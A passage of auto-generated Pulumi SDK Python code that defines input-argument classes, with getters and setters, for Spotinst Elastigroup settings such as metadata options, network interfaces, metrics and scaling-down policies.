def __init__(__self__, *,
tag_key: pulumi.Input[str],
tag_value: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "tag_key", tag_key)
if tag_value is not None:
pulumi.set(__self__, "tag_value", tag_value)
@property
@pulumi.getter(name="tagKey")
def tag_key(self) -> pulumi.Input[str]:
return pulumi.get(self, "tag_key")
@tag_key.setter
def tag_key(self, value: pulumi.Input[str]):
pulumi.set(self, "tag_key", value)
@property
@pulumi.getter(name="tagValue")
def tag_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "tag_value")
@tag_value.setter
def tag_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_value", value)
@pulumi.input_type
class ElastigroupMetadataOptionsArgs:
def __init__(__self__, *,
http_tokens: pulumi.Input[str],
http_put_response_hop_limit: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] http_tokens: The state of token usage for your instance metadata requests. Valid values: `optional` or `required`.
:param pulumi.Input[int] http_put_response_hop_limit: The desired HTTP PUT response hop limit for instance metadata requests. The larger the number, the further instance metadata requests can travel. Valid values: Integers from `1` to `64`.
"""
pulumi.set(__self__, "http_tokens", http_tokens)
if http_put_response_hop_limit is not None:
pulumi.set(__self__, "http_put_response_hop_limit", http_put_response_hop_limit)
@property
@pulumi.getter(name="httpTokens")
def http_tokens(self) -> pulumi.Input[str]:
"""
The state of token usage for your instance metadata requests. Valid values: `optional` or `required`.
"""
return pulumi.get(self, "http_tokens")
@http_tokens.setter
def http_tokens(self, value: pulumi.Input[str]):
pulumi.set(self, "http_tokens", value)
@property
@pulumi.getter(name="httpPutResponseHopLimit")
def http_put_response_hop_limit(self) -> Optional[pulumi.Input[int]]:
"""
The desired HTTP PUT response hop limit for instance metadata requests. The larger the number, the further instance metadata requests can travel. Valid values: Integers from `1` to `64`.
"""
return pulumi.get(self, "http_put_response_hop_limit")
@http_put_response_hop_limit.setter
def http_put_response_hop_limit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_put_response_hop_limit", value)
@pulumi.input_type
class ElastigroupMultaiTargetSetArgs:
def __init__(__self__, *,
balancer_id: pulumi.Input[str],
target_set_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] balancer_id: ID of Multai Load Balancer.
:param pulumi.Input[str] target_set_id: ID of Multai target set.
"""
pulumi.set(__self__, "balancer_id", balancer_id)
pulumi.set(__self__, "target_set_id", target_set_id)
@property
@pulumi.getter(name="balancerId")
def balancer_id(self) -> pulumi.Input[str]:
"""
ID of Multai Load Balancer.
"""
return pulumi.get(self, "balancer_id")
@balancer_id.setter
def balancer_id(self, value: pulumi.Input[str]):
pulumi.set(self, "balancer_id", value)
@property
@pulumi.getter(name="targetSetId")
def target_set_id(self) -> pulumi.Input[str]:
"""
ID of Multai target set.
"""
return pulumi.get(self, "target_set_id")
@target_set_id.setter
def target_set_id(self, value: pulumi.Input[str]):
pulumi.set(self, "target_set_id", value)
@pulumi.input_type
class ElastigroupMultipleMetricsArgs:
def __init__(__self__, *,
expressions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]]] = None,
metrics: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]] expressions: Array of objects (Expression config)
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]] metrics: Array of objects (Metric config)
"""
if expressions is not None:
pulumi.set(__self__, "expressions", expressions)
if metrics is not None:
pulumi.set(__self__, "metrics", metrics)
@property
@pulumi.getter
def expressions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]]]:
"""
Array of objects (Expression config)
"""
return pulumi.get(self, "expressions")
@expressions.setter
def expressions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsExpressionArgs']]]]):
pulumi.set(self, "expressions", value)
@property
@pulumi.getter
def metrics(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]]]:
"""
Array of objects (Metric config)
"""
return pulumi.get(self, "metrics")
@metrics.setter
def metrics(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricArgs']]]]):
pulumi.set(self, "metrics", value)
@pulumi.input_type
class ElastigroupMultipleMetricsExpressionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
name: pulumi.Input[str]):
"""
:param pulumi.Input[str] expression: An expression consisting of the metric names listed in the 'metrics' array.
:param pulumi.Input[str] name: The record set name.
"""
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
"""
An expression consisting of the metric names listed in the 'metrics' array.
"""
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ElastigroupMultipleMetricsMetricArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
name: pulumi.Input[str],
namespace: pulumi.Input[str],
dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]]] = None,
extended_statistic: Optional[pulumi.Input[str]] = None,
statistic: Optional[pulumi.Input[str]] = None,
unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric, with or without spaces.
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] namespace: The namespace for the alarm's associated metric.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
*`name` - (Required) the dimension name.
*`value` - (Optional) the dimension value.
:param pulumi.Input[str] extended_statistic: Percentile statistic. Valid values: `"p0.1"` - `"p100"`.
:param pulumi.Input[str] statistic: The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
:param pulumi.Input[str] unit: The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if extended_statistic is not None:
pulumi.set(__self__, "extended_statistic", extended_statistic)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if unit is not None:
pulumi.set(__self__, "unit", unit)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric, with or without spaces.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
The namespace for the alarm's associated metric.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]]]:
"""
A list of dimensions describing qualities of the metric.
*`name` - (Required) the dimension name.
*`value` - (Optional) the dimension value.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupMultipleMetricsMetricDimensionArgs']]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="extendedStatistic")
def extended_statistic(self) -> Optional[pulumi.Input[str]]:
"""
Percentile statistic. Valid values: `"p0.1"` - `"p100"`.
"""
return pulumi.get(self, "extended_statistic")
@extended_statistic.setter
def extended_statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "extended_statistic", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def unit(self) -> Optional[pulumi.Input[str]]:
"""
The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupMultipleMetricsMetricDimensionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupNetworkInterfaceArgs:
def __init__(__self__, *,
device_index: pulumi.Input[str],
associate_ipv6_address: Optional[pulumi.Input[bool]] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
delete_on_termination: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
network_interface_id: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
secondary_private_ip_address_count: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] device_index: The index of the device on the instance for the network interface attachment.
:param pulumi.Input[bool] associate_ipv6_address: Indicates whether to assign IPV6 addresses to your instance. Requires a subnet with IPV6 CIDR block ranges.
:param pulumi.Input[bool] associate_public_ip_address: Indicates whether to assign a public IP address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one.
:param pulumi.Input[bool] delete_on_termination: If set to true, the interface is deleted when the instance is terminated.
:param pulumi.Input[str] description: The description of the network interface.
:param pulumi.Input[str] network_interface_id: The ID of the network interface.
:param pulumi.Input[str] private_ip_address: The private IP address of the network interface.
:param pulumi.Input[str] secondary_private_ip_address_count: The number of secondary private IP addresses.
"""
pulumi.set(__self__, "device_index", device_index)
if associate_ipv6_address is not None:
pulumi.set(__self__, "associate_ipv6_address", associate_ipv6_address)
if associate_public_ip_address is not None:
pulumi.set(__self__, "associate_public_ip_address", associate_public_ip_address)
if delete_on_termination is not None:
pulumi.set(__self__, "delete_on_termination", delete_on_termination)
if description is not None:
pulumi.set(__self__, "description", description)
if network_interface_id is not None:
pulumi.set(__self__, "network_interface_id", network_interface_id)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if secondary_private_ip_address_count is not None:
pulumi.set(__self__, "secondary_private_ip_address_count", secondary_private_ip_address_count)
@property
@pulumi.getter(name="deviceIndex")
def device_index(self) -> pulumi.Input[str]:
"""
The index of the device on the instance for the network interface attachment.
"""
return pulumi.get(self, "device_index")
@device_index.setter
def device_index(self, value: pulumi.Input[str]):
pulumi.set(self, "device_index", value)
@property
@pulumi.getter(name="associateIpv6Address")
def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether to assign IPV6 addresses to your instance. Requires a subnet with IPV6 CIDR block ranges.
"""
return pulumi.get(self, "associate_ipv6_address")
@associate_ipv6_address.setter
def associate_ipv6_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_ipv6_address", value)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether to assign a public IP address to an instance you launch in a VPC. The public IP address can only be assigned to a network interface for eth0, and can only be assigned to a new network interface, not an existing one.
"""
return pulumi.get(self, "associate_public_ip_address")
@associate_public_ip_address.setter
def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_public_ip_address", value)
@property
@pulumi.getter(name="deleteOnTermination")
def delete_on_termination(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true, the interface is deleted when the instance is terminated.
"""
return pulumi.get(self, "delete_on_termination")
@delete_on_termination.setter
def delete_on_termination(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "delete_on_termination", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the network interface.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="networkInterfaceId")
def network_interface_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the network interface.
"""
return pulumi.get(self, "network_interface_id")
@network_interface_id.setter
def network_interface_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_interface_id", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address of the network interface.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="secondaryPrivateIpAddressCount")
def secondary_private_ip_address_count(self) -> Optional[pulumi.Input[str]]:
"""
The number of secondary private IP addresses.
"""
return pulumi.get(self, "secondary_private_ip_address_count")
@secondary_private_ip_address_count.setter
def secondary_private_ip_address_count(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secondary_private_ip_address_count", value)
@pulumi.input_type
class ElastigroupResourceTagSpecificationArgs:
def __init__(__self__, *,
should_tag_amis: Optional[pulumi.Input[bool]] = None,
should_tag_enis: Optional[pulumi.Input[bool]] = None,
should_tag_snapshots: Optional[pulumi.Input[bool]] = None,
should_tag_volumes: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] should_tag_amis: Tag specification for AMI resources.
:param pulumi.Input[bool] should_tag_enis: Tag specification for ENI resources.
:param pulumi.Input[bool] should_tag_snapshots: Tag specification for Snapshot resources.
:param pulumi.Input[bool] should_tag_volumes: Tag specification for Volume resources.
"""
if should_tag_amis is not None:
pulumi.set(__self__, "should_tag_amis", should_tag_amis)
if should_tag_enis is not None:
pulumi.set(__self__, "should_tag_enis", should_tag_enis)
if should_tag_snapshots is not None:
pulumi.set(__self__, "should_tag_snapshots", should_tag_snapshots)
if should_tag_volumes is not None:
pulumi.set(__self__, "should_tag_volumes", should_tag_volumes)
@property
@pulumi.getter(name="shouldTagAmis")
def should_tag_amis(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for AMI resources.
"""
return pulumi.get(self, "should_tag_amis")
@should_tag_amis.setter
def should_tag_amis(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_amis", value)
@property
@pulumi.getter(name="shouldTagEnis")
def should_tag_enis(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for ENI resources.
"""
return pulumi.get(self, "should_tag_enis")
@should_tag_enis.setter
def should_tag_enis(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_enis", value)
@property
@pulumi.getter(name="shouldTagSnapshots")
def should_tag_snapshots(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for Snapshot resources.
"""
return pulumi.get(self, "should_tag_snapshots")
@should_tag_snapshots.setter
def should_tag_snapshots(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_snapshots", value)
@property
@pulumi.getter(name="shouldTagVolumes")
def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
Tag specification for Volume resources.
"""
return pulumi.get(self, "should_tag_volumes")
@should_tag_volumes.setter
def should_tag_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_tag_volumes", value)
@pulumi.input_type
class ElastigroupRevertToSpotArgs:
def __init__(__self__, *,
perform_at: pulumi.Input[str],
time_windows: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] perform_at: Actions to perform (options: timeWindow, never)
:param pulumi.Input[Sequence[pulumi.Input[str]]] time_windows: Specify a list of time windows for to execute revertToSpot strategy. Time window format: `ddd:hh:mm-ddd:hh:mm`. Example: `Mon:03:00-Wed:02:30`
"""
pulumi.set(__self__, "perform_at", perform_at)
if time_windows is not None:
pulumi.set(__self__, "time_windows", time_windows)
@property
@pulumi.getter(name="performAt")
def perform_at(self) -> pulumi.Input[str]:
"""
Actions to perform (options: timeWindow, never)
"""
return pulumi.get(self, "perform_at")
@perform_at.setter
def perform_at(self, value: pulumi.Input[str]):
pulumi.set(self, "perform_at", value)
@property
@pulumi.getter(name="timeWindows")
def time_windows(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specify a list of time windows for to execute revertToSpot strategy. Time window format: `ddd:hh:mm-ddd:hh:mm`. Example: `Mon:03:00-Wed:02:30`
"""
return pulumi.get(self, "time_windows")
@time_windows.setter
def time_windows(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "time_windows", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
source: Optional[pulumi.Input[str]] = None,
statistic: Optional[pulumi.Input[str]] = None,
step_adjustments: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]]] = None,
target: Optional[pulumi.Input[str]] = None,
threshold: Optional[pulumi.Input[float]] = None,
unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric, with or without spaces.
:param pulumi.Input[str] namespace: The namespace for the alarm's associated metric.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[str] action_type: The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[bool] is_enabled: Specifies whether the scaling policy described in this block is enabled.
:param pulumi.Input[str] max_target_capacity: . The number of the desired target (and maximum) capacity
:param pulumi.Input[str] maximum: The maximal number of instances to have in the group.
:param pulumi.Input[str] min_target_capacity: The desired target capacity of a group. Required if using `"setMinTarget"` as action type
:param pulumi.Input[str] minimum: The minimal number of instances to have in the group.
:param pulumi.Input[str] operator: The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
:param pulumi.Input[int] period: The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
:param pulumi.Input[str] source: The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
:param pulumi.Input[str] statistic: The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
:param pulumi.Input[str] target: The target number of instances to have in the group.
:param pulumi.Input[float] threshold: The value against which the specified statistic is compared in order to determine if a step should be applied.
:param pulumi.Input[str] unit: The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if source is not None:
pulumi.set(__self__, "source", source)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if step_adjustments is not None:
pulumi.set(__self__, "step_adjustments", step_adjustments)
if target is not None:
pulumi.set(__self__, "target", target)
if threshold is not None:
pulumi.set(__self__, "threshold", threshold)
if unit is not None:
pulumi.set(__self__, "unit", unit)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric, with or without spaces.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
The namespace for the alarm's associated metric.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]]:
"""
A list of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyDimensionArgs']]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the scaling policy described in this block is enabled.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
. The number of the desired target (and maximum) capacity
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The maximal number of instances to have in the group.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMinTarget"` as action type
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The minimal number of instances to have in the group.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter(name="stepAdjustments")
def step_adjustments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]]]:
return pulumi.get(self, "step_adjustments")
@step_adjustments.setter
def step_adjustments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentArgs']]]]):
pulumi.set(self, "step_adjustments", value)
@property
@pulumi.getter
